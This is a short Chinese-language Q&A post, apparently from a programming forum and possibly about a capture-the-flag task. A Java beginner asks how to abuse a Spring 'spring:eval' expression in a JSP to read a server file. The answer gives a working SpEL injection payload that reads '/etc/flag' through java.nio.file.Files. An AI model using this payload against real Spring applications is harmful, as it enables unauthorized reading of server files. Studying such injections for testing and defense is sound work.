我是java的新手,不知道怎么做。我有以下问题:有java服务器,请求客户端请求jsp文件。 jsp文件的结构如下:
<div>
<spring:eval expression="${name}"></spring:eval>
</div>
在客户端我有一个简单的表单,我可以在其中输入名称。我需要做的是:使用eval表达式漏洞从服务器读取文件/secret。我尝试过这样的事情:new FileReader("/secret")。但是我遇到了这个问题:Failed to resolve constructor。
如何阅读必要的文件?
全部谢谢!
答案 0 :(得分:1)
您需要使用T(..)引用类并使用Files.readAllLines()
T(java.nio.file.Files).readAllLines(T(java.nio.file.Paths).get("/etc/flag"), T(java.nio.charset.Charset).defaultCharset())